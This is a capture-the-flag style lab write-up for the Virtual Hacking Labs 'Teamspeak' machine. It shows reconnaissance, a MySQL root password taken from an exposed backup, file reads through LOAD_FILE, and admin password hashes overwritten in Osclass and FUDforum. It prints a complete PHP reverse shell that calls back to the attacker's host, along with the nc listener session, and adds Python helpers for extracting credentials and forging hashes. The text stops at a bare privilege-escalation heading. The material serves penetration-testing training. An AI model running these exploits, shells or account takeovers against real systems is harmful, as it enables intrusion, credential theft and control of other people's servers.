VHL — Teamspeak
Misc · Medium · Linux
TeamSpeak 3 server on CentOS 6.7. FTP enumeration led to an Osclass backup containing the MySQL root password; the database, exposed on 3306, was used to take over the admin accounts of both web applications, one of which served to drop a PHP reverse shell as apache. Root via Dirty COW (CVE-2016-5195).
February 15, 2025 · Virtual Hacking Labs
#TeamSpeak #FTP #CentOS #Service Exploit
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-15 01:10 EST
Nmap scan report for 10.11.1.142
Host is up (0.12s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.2.2
|_ftp-anon: got code 500 "OOPS: cannot change directory:/opt/teamspeak3-server_linux-x86/files/virtualserver_1/".
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 79:93:2b:9c:c0:c7:b0:c1:0a:5f:63:3c:78:eb:2f:40 (DSA)
|_ 2048 0f:67:e8:a7:0a:94:9a:5a:75:35:a3:fe:1f:a3:e2:d3 (RSA)
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOS
443/tcp open ssl/http Apache httpd 2.2.15 ((CentOS))
| ssl-cert: Subject: commonName=teamspeak/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2016-12-31T12:13:13
|_Not valid after: 2017-12-31T12:13:13
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-robots.txt: 2 disallowed entries
|_/fudforum/ /osclass/
|_ssl-date: 2025-02-15T06:17:52+00:00; +1s from scanner time.
|_http-server-header: Apache/2.2.15 (CentOS)
3306/tcp open mysql MySQL 5.1.73
| mysql-info:
| Protocol: 10
| Version: 5.1.73
| Thread ID: 18
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, InteractiveClient, LongPassword, IgnoreSigpipes, LongColumnFlag, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn
| Status: Autocommit
|_ Salt: j{OU<m0EJ'!o-1LkWRri
10011/tcp open textui TeamSpeak 3 ServerQuery
30033/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running (JUST GUESSING): Cisco embedded (88%), Linux 2.6.X (88%)
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
Aggressive OS guesses: Cisco Unified Communications Manager VoIP adapter (88%), Linux 2.6.26 (PCLinuxOS) (88%), Linux 2.6.32 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 120.39 ms 10.11.1.142
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 461.39 seconds
Attack surface from the scan: anonymous FTP whose error leaks a TeamSpeak path, Apache 2.2.15 with /fudforum/ and /osclass/ listed in robots.txt (behind a self-signed certificate that expired in 2017), MySQL 5.1.73 reachable on 3306, TeamSpeak ServerQuery on 10011 and the TeamSpeak file-transfer port 30033.

21
sh
21/tcp open ftp vsftpd 2.2.2
|_ftp-anon: got code 500 "OOPS: cannot change directory:/opt/teamspeak3-server_linux-x86/files/virtualserver_1/".
The 500 is not an authentication failure: vsftpd only attempts that chdir after the login has succeeded, so anonymous access is enabled even though the session then dies. The error message also leaks the TeamSpeak install directory (/opt/teamspeak3-server_linux-x86/) and the virtual server's files directory.

80
sh
80/tcp open http Apache httpd 2.2.15 ((CentOS))
|_http-title: Apache HTTP Server Test Page powered by CentOS
The document root serves the stock CentOS test page, but robots.txt (seen on 443) already disallows /fudforum/ and /osclass/, so both applications are worth enumerating directly.

directory search
sh
[####################] - 34m 1951097/1951097 0s found:1054 errors:776016
[####################] - 29m 30000/30000 17/s http://10.11.1.142/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/osclass/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/
[####################] - 5s 30000/30000 6591/s http://10.11.1.142/icons/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/images/
[####################] - 1s 30000/30000 50676/s http://10.11.1.142/fudforum/js/ => Directory listing
[####################] - 1s 30000/30000 38610/s http://10.11.1.142/fudforum/js/ui/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/adm/
[####################] - 1s 30000/30000 28302/s http://10.11.1.142/icons/small/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/
[####################] - 1s 30000/30000 44978/s http://10.11.1.142/fudforum/images/fonts/ => Directory listing
[####################] - 9s 30000/30000 3208/s http://10.11.1.142/manual/images/ => Directory listing
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/misc/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/en/
[####################] - 29m 30000/30000 17/s http://10.11.1.142/fudforum/images/avatars/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/de/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/fr/
[####################] - 1s 30000/30000 50251/s http://10.11.1.142/manual/style/ => Directory listing
[####################] - 1s 30000/30000 52448/s http://10.11.1.142/fudforum/theme/ => Directory listing
[####################] - 3s 30000/30000 11274/s http://10.11.1.142/fudforum/adm/style/ => Directory listing
[####################] - 29m 30000/30000 17/s http://10.11.1.142/manual/en/misc/
[####################] - 30m 30000/30000 17/s http://10.11.1.142/manual/ru/
[####################] - 5s 30000/30000 6620/s http://10.11.1.142/manual/style/css/ => Directory listing
[####################] - 2s 30000/30000 17422/s http://10.11.1.142/manual/style/lang/ => Directory listing
[####################] - 2s 30000/30000 17442/s http://10.11.1.142/manual/style/xsl/ => Directory listing 

sh
unzip Osclass_backup.20170102122648.zip -d Osclass_backup

CHANGELOG.txt
sh
cat CHANGELOG.txt
Osclass 3.4.1 2014-08-04
------------------------
- Fixed some compatibility issues with PHP 5.2
- Minor bug fixes and improvements
Osclass 3.4.1 dates from August 2014, so the install is years out of date. The backup also contains the application's config.php, which is where the database credentials live.

sh
cat config.php
<?php
/**
* The base MySQL settings of Osclass
*/
define('MULTISITE', 0);
/** MySQL database name for Osclass */
define('DB_NAME', 'osclass');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'RootAccount91ow');

creds
root:RootAccount91ow
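Pulling the credentials out of one config.php by hand is quick, but a backup usually contains several config files. The Python below is an added example (not from the writeup) that walks a PHP config source for credential-looking values, understanding both the define('DB_PASSWORD', ...) constants that Osclass and similar applications use and plain $var = '...' assignments, and builds the mysql client invocation from them. The embedded sample config is constructed from the values shown above; the $cfg_admin_pass line is invented only to exercise the assignment form.

```python
"""Pull database credentials out of PHP config files found in an application backup.

Added example, not part of the original writeup. It understands the two styles most
PHP applications use: define('DB_PASSWORD', '...') constants (Osclass, WordPress) and
$dbpass = '...' assignments. The sample config below is constructed from the values
shown in the writeup; the $cfg_admin_pass line is invented for the demo.
"""
import re
from typing import Dict

# Constructed sample: the relevant lines of Osclass's config.php as seen in the backup.
SAMPLE_CONFIG = r"""<?php
define('MULTISITE', 0);
define('DB_NAME', 'osclass');
define('DB_USER', 'root');
define('DB_PASSWORD', 'RootAccount91ow');
define('DB_HOST', "localhost");
define('TABLE_PREFIX', 'oc_');
$cfg_admin_pass = 'unused-but-interesting';
"""

# Name fragments worth reporting; matched case-insensitively against the constant/variable name.
INTERESTING = ("PASS", "PWD", "SECRET", "USER", "DB_NAME", "DB_HOST", "KEY", "TOKEN")

# define('NAME', 'value') with either quote style; the value must be a quoted string.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[^'"]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)""",
    re.IGNORECASE,
)
# $name = 'value'; assignments.
ASSIGN_RE = re.compile(
    r"""\$(?P<name>[A-Za-z_]\w*)\s*=\s*(['"])(?P<value>.*?)\2\s*;""",
)


def extract_credentials(php_source: str) -> Dict[str, str]:
    """Return {NAME: value} for every define()/assignment whose name looks credential-like."""
    found: Dict[str, str] = {}
    for regex in (DEFINE_RE, ASSIGN_RE):
        for m in regex.finditer(php_source):
            name = m.group("name")
            if any(tag in name.upper() for tag in INTERESTING):
                found[name] = m.group("value")
    return found


def mysql_login_line(creds: Dict[str, str], host: str) -> str:
    """Build the mysql client invocation for Osclass/WordPress-style DB_* credentials."""
    user = creds.get("DB_USER", "")
    password = creds.get("DB_PASSWORD", "")
    db = creds.get("DB_NAME", "")
    # Single-quote the password so shell metacharacters survive; escape embedded quotes.
    quoted = "'" + password.replace("'", "'\"'\"'") + "'"
    return f"mysql -u {user} -p{quoted} -h {host} {db}".rstrip()


if __name__ == "__main__":
    creds = extract_credentials(SAMPLE_CONFIG)
    for k, v in creds.items():
        print(f"{k} = {v}")
    print(mysql_login_line(creds, "10.11.1.142"))
```

Run it over every *.php under the extracted backup directory; anything it reports for a backup that was reachable without authentication is a finding on its own, regardless of whether the database is exposed.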
3306
sh
3306/tcp open mysql MySQL 5.1.73
| mysql-info:
| Protocol: 10
| Version: 5.1.73
| Thread ID: 18
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, InteractiveClient, LongPassword, IgnoreSigpipes, LongColumnFlag, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn
| Status: Autocommit
|_ Salt: j{OU<m0EJ'!o-1LkWRri

sh
mysql -u root -p'RootAccount91ow' -h 10.11.1.142
The root account accepts the password from the backup over the network: 3306 is reachable from the attacking host and the root login is not restricted to localhost.

osclass database
sh
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| fudforum |
| mysql |
| osclass |
+--------------------+
4 rows in set (0.017 sec)

sh
MySQL [(none)]> use osclass
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [osclass]> show tables;
+---------------------------+
| Tables_in_osclass |
+---------------------------+
| oc_t_admin |
| oc_t_alerts |
| oc_t_alerts_sent |
| oc_t_ban_rule |
| oc_t_category |
| oc_t_category_description |
| oc_t_category_stats |
| oc_t_city |
| oc_t_city_area |
| oc_t_city_stats |
| oc_t_country |
| oc_t_country_stats |
| oc_t_cron |
| oc_t_currency |
| oc_t_item |
| oc_t_item_comment |
| oc_t_item_description |
| oc_t_item_location |
| oc_t_item_meta |
| oc_t_item_resource |
| oc_t_item_stats |
| oc_t_keywords |
| oc_t_latest_searches |
| oc_t_locale |
| oc_t_locations_tmp |
| oc_t_log |
| oc_t_meta_categories |
| oc_t_meta_fields |
| oc_t_pages |
| oc_t_pages_description |
| oc_t_plugin_category |
| oc_t_preference |
| oc_t_region |
| oc_t_region_stats |
| oc_t_user |
| oc_t_user_description |
| oc_t_user_email_tmp |
| oc_t_widget |
+---------------------------+
38 rows in set (0.017 sec)

sh
MySQL [osclass]> select * from oc_t_admin;
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
| pk_i_id | s_name | s_username | s_password | s_email | s_secret | b_moderator |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
| 1 | Administrator | admin | $2a$15$7yFZw5/fKNID2hbVnb/6JOxNIhp75pDtN/93bxeVb9xrGeFWwb8s6 | admin@10.11.1.142.local | NULL | 0 |
+---------+---------------+------------+--------------------------------------------------------------+-------------------------+----------+-------------+
1 row in set (0.017 sec)

sh
MySQL [osclass]> SELECT LOAD_FILE('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin

LOAD_FILE() returning the contents means root holds the MySQL FILE privilege and secure_file_priv is not restricting it (MySQL 5.1 leaves it unset by default). The same privilege also covers SELECT ... INTO OUTFILE, so this account can write wherever mysqld can, not just read. Two details from the file itself: the ftp account's home is /var/ftp, so the anonymous chdir target seen earlier (/opt/teamspeak3-server_linux-x86/files/virtualserver_1/) is a deliberately configured anonymous root over the TeamSpeak file store; and the mysql service account has /bin/bash as its login shell.

- generate a bcrypt (Blowfish) hash for a password you control and swap it in for the admin's. The stored hash uses cost 15, which makes offline cracking slow, so replacing it is the pragmatic route; keep a copy of the original value ($2a$15$7yFZw5/fKNID2hbVnb/6JOxNIhp75pDtN/93bxeVb9xrGeFWwb8s6) so the row can be restored afterwards.
password123 (bcrypt, cost 12): $2a$12$5APmPatM4ji3r767Sk8bEueZR1fE2Rw21NcxMw2heIhu1E/MpklQa
sh
MySQL [osclass]> UPDATE oc_t_admin SET s_password = '$2a$12$5APmPatM4ji3r767Sk8bEueZR1fE2Rw21NcxMw2heIhu1E/MpklQa' WHERE pk_i_id = 1;
fudforum database
sh
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| fudforum |
| mysql |
| osclass |
+--------------------+
4 rows in set (0.016 sec)
MySQL [(none)]> use fudforum;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [fudforum]> show tables;
+-------------------------+
| Tables_in_fudforum |
+-------------------------+
| fud30_action_log |
| fud30_ann_forums |
| fud30_announce |
| fud30_attach |
| fud30_avatar |
| fud30_blocked_logins |
| fud30_bookmarks |
| fud30_buddy |
| fud30_calendar |
| fud30_cat |
| fud30_custom_fields |
| fud30_custom_tags |
| fud30_email_block |
| fud30_ext_block |
| fud30_fc_view |
| fud30_fl_1 |
| fud30_fl_2 |
| fud30_fl_3 |
| fud30_fl_pg |
| fud30_fl_pm |
| fud30_forum |
| fud30_forum_notify |
| fud30_forum_read |
| fud30_geoip |
| fud30_group_cache |
| fud30_group_members |
| fud30_group_resources |
| fud30_groups |
| fud30_index |
| fud30_ip_block |
| fud30_jobs |
| fud30_karma_rate_track |
| fud30_level |
| fud30_mime |
| fud30_mlist |
| fud30_mod |
| fud30_msg |
| fud30_msg_report |
| fud30_msg_store |
| fud30_nntp |
| fud30_pages |
| fud30_plugins |
| fud30_pmsg |
| fud30_poll |
| fud30_poll_opt |
| fud30_poll_opt_track |
| fud30_read |
| fud30_replace |
| fud30_search |
| fud30_search_cache |
| fud30_ses |
| fud30_smiley |
| fud30_spiders |
| fud30_stats_cache |
| fud30_themes |
| fud30_thr_exchange |
| fud30_thread |
| fud30_thread_notify |
| fud30_thread_rate_track |
| fud30_title_index |
| fud30_tv_1 |
| fud30_tv_2 |
| fud30_tv_3 |
| fud30_user_ignore |
| fud30_users |
| fud30_xmlagg |
+-------------------------+
66 rows in set (0.021 sec)

sh
MySQL [fudforum]> use fud30_users;
ERROR 1049 (42000): Unknown database 'fud30_users'
MySQL [fudforum]> select * from fud30_users;
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
| id | login | alias | passwd | salt | name | email | location | interests | occupation | avatar | avatar_loc | icq | aim | yahoo | msnm | jabber | affero | google | skype | twitter | posts_ppg | time_zone | birthday | join_date | conf_key | reset_key | user_image | theme | posted_msg_count | last_visit | referer_id | last_read | custom_status | sig | level_id | karma | u_last_post_id | home_page | bio | cat_collapse_status | custom_color | buddy_list | ignore_list | group_leader_list | users_opt | sq | registration_ip | last_used_ip | ban_expiry | topics_per_page | last_login | flag_cc | flag_country | custom_fields |
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
| 1 | Anonymous | Anonymous | 1 | NULL | Anonymous | dev@null | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4488117 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 2 | admin | admin | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Administrator | apache@10.11.1.142 | NULL | NULL | NULL | 3 | <img src="images/avatars/smiley03.jpg" alt="" width="64" height="64" /> | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 2 | 1483377470 | 0 | 0 | Administrator | NULL | 3 | 0 | 5 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 13777910 | 226d8805... | ::1 | 172.16.1.1 | 0 | 40 | 1739606203 | NULL | NULL | NULL |
| 3 | Google | Google | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Googlebot | Google@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 4 | Yahoo | Yahoo | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Yahoo! | Yahoo@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 5 | Bing | Bing | 6e70a4585a317ad3753391124636a087c98184f6 | 186317a0f | Bing | Bing@fud_spiders | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | America/New_York | NULL | 1483355387 | NULL | NULL | NULL | 1 | 0 | 0 | 0 | 0 | NULL | NULL | 0 | 0 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 1715893141 | NULL | ::1 | ::1 | 0 | 40 | 0 | NULL | NULL | NULL |
| 6 | Bob | Bob | 7eb2cfb5aab709e44a0d0882f11d42e969e50ce8 | 1680ab3d2 | | bob@bob.local | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 40 | America/New_York | NULL | 1483355872 | c6bd867a... | NULL | NULL | 1 | 1 | 1483355927 | 0 | 1483355872 | NULL | NULL | 3 | 0 | 3 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4357110 | 23476319... | 172.16.1.1 | 172.16.1.1 | 0 | 40 | 1483355892 | NULL | NULL | |
| 7 | Samantha | Samantha | 321b4e68f55efc4595dcc09a573391a250cfb811 | 7bd030dd8 | | samantha@samantha.local | NULL | NULL | NULL | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 40 | America/New_York | NULL | 1483356039 | 08e1fc4a... | NULL | NULL | 1 | 1 | 1483377427 | 0 | 1483356039 | NULL | NULL | 3 | 0 | 4 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 4357110 | d217a5da... | 172.16.1.1 | 172.16.1.1 | 0 | 40 | 1483377411 | NULL | NULL | |
+----+-----------+-----------+------------------------------------------+-----------+---------------+-------------------------+----------+-----------+------------+--------+-------------------------------------------------------------------------+------+------+-------+------+--------+--------+--------+-------+---------+-----------+------------------+----------+------------+----------------------------------+-----------+------------+-------+------------------+------------+------------+------------+---------------+------+----------+-------+----------------+-----------+------+---------------------+--------------+------------+-------------+-------------------+------------+----------------------------------+-----------------+--------------+------------+-----------------+------------+---------+--------------+---------------+
7 rows in set (0.023 sec)
- register a new forum user through the web interface with a password you know
- read that user's passwd and salt back from fud30_users and copy both onto the admin row (id 2); this sidesteps the need to know FUDforum's hashing construction. Save the admin's original passwd (6e70a4585a317ad3753391124636a087c98184f6) and salt (186317a0f) first so the account can be restored.
sh
MySQL [fudforum]> UPDATE fud30_users SET passwd = 'd979570205b509107f024cd0d4c563e3f9ccbb30' WHERE id = 2;
Query OK, 1 row affected (0.020 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [fudforum]> UPDATE fud30_users SET salt = 'cedadea50' WHERE id = 2;
Query OK, 1 row affected (0.020 sec)
Rows matched: 1 Changed: 1 Warnings: 0
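The two UPDATEs above work because a fresh user's passwd and salt were copied onto the admin row, which avoids needing to know how FUDforum hashes passwords. The Python below is an added example, not part of the writeup: given a registered account whose password you know, it identifies which common salted-SHA1/MD5 construction the application uses and then forges a hash for the admin row using the admin's existing salt, so only the passwd column changes. The candidate constructions and the sample account (password, salt and hash) are assumptions constructed for the demo; FUDforum's real construction should be confirmed from its source before trusting the result on a live system.

```python
"""Identify a web app's salted-hash scheme from an account you control, then forge the admin hash.

Added example, not from the original writeup. The writeup sidesteps the question by
copying a fresh user's passwd+salt onto the admin row; this does the same job but keeps
the admin's own salt, so only one column changes. The candidate list is an assumption
(common PHP-forum constructions, not taken from the FUDforum code), and the sample
account below is constructed with one of them.
"""
import hashlib
from typing import Callable, Dict, Optional, Tuple

Scheme = Callable[[str, str], str]  # (salt, password) -> hex digest


def _h(alg: str, data: str) -> str:
    return hashlib.new(alg, data.encode()).hexdigest()


# Candidate constructions (assumed). Order matters only for which name is reported first.
CANDIDATES: Dict[str, Scheme] = {
    "sha1(salt + pw)":        lambda s, p: _h("sha1", s + p),
    "sha1(pw + salt)":        lambda s, p: _h("sha1", p + s),
    "sha1(salt + sha1(pw))":  lambda s, p: _h("sha1", s + _h("sha1", p)),
    "sha1(sha1(pw) + salt)":  lambda s, p: _h("sha1", _h("sha1", p) + s),
    "md5(salt + pw)":         lambda s, p: _h("md5", s + p),
    "md5(pw + salt)":         lambda s, p: _h("md5", p + s),
    "md5(salt + md5(pw))":    lambda s, p: _h("md5", s + _h("md5", p)),
}


def identify_scheme(password: str, salt: str, stored: str) -> Optional[str]:
    """Return the name of the first candidate that reproduces `stored`, or None."""
    stored = stored.lower()
    for name, fn in CANDIDATES.items():
        if fn(salt, password) == stored:
            return name
    return None


def forge_update(table: str, id_col: str, row_id: int, scheme: str,
                 existing_salt: str, new_password: str) -> Tuple[str, str]:
    """Build the UPDATE that sets a known password for `row_id`, keeping its existing salt."""
    new_hash = CANDIDATES[scheme](existing_salt, new_password)
    sql = f"UPDATE {table} SET passwd = '{new_hash}' WHERE {id_col} = {row_id};"
    return new_hash, sql


# Constructed sample: a user registered with a known password, hashed with one candidate.
# The salt is the 9-hex-character shape seen in fud30_users; the password is made up.
KNOWN_PASSWORD = "Winter2025!"
KNOWN_SALT = "cedadea50"
KNOWN_HASH = CANDIDATES["sha1(salt + sha1(pw))"](KNOWN_SALT, KNOWN_PASSWORD)


if __name__ == "__main__":
    scheme = identify_scheme(KNOWN_PASSWORD, KNOWN_SALT, KNOWN_HASH)
    print("scheme:", scheme)
    if scheme:
        # Admin row id 2 and its salt as shown in fud30_users in the writeup.
        new_hash, sql = forge_update("fud30_users", "id", 2, scheme, "186317a0f", "password123")
        print(new_hash)
        print(sql)
```

If identify_scheme() returns None, none of the assumed constructions apply and the copy-the-row trick from the writeup is the safer fallback; either way, record the original passwd and salt before running the UPDATE.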


php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.16.1.1'; // attacker IP (the nc listener below)
$port = 80; // must match the nc listener below; the stock template ships with 1234
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
- place pentestmonkey's php-reverse-shell on the target with $ip and $port pointed at the attacker's listener, and have nc listening before the shell is requested.

sh
nc -lnvp 80
listening on [any] 80 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.142] 60007
Linux teamspeak 2.6.32-573.el6.i686 #1 SMP Thu Jul 23 12:37:35 UTC 2015 i686 i686 i386 GNU/Linux
13:08:47 up 12:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache

sh
python -c 'import pty; pty.spawn("/bin/bash")'

priv esc
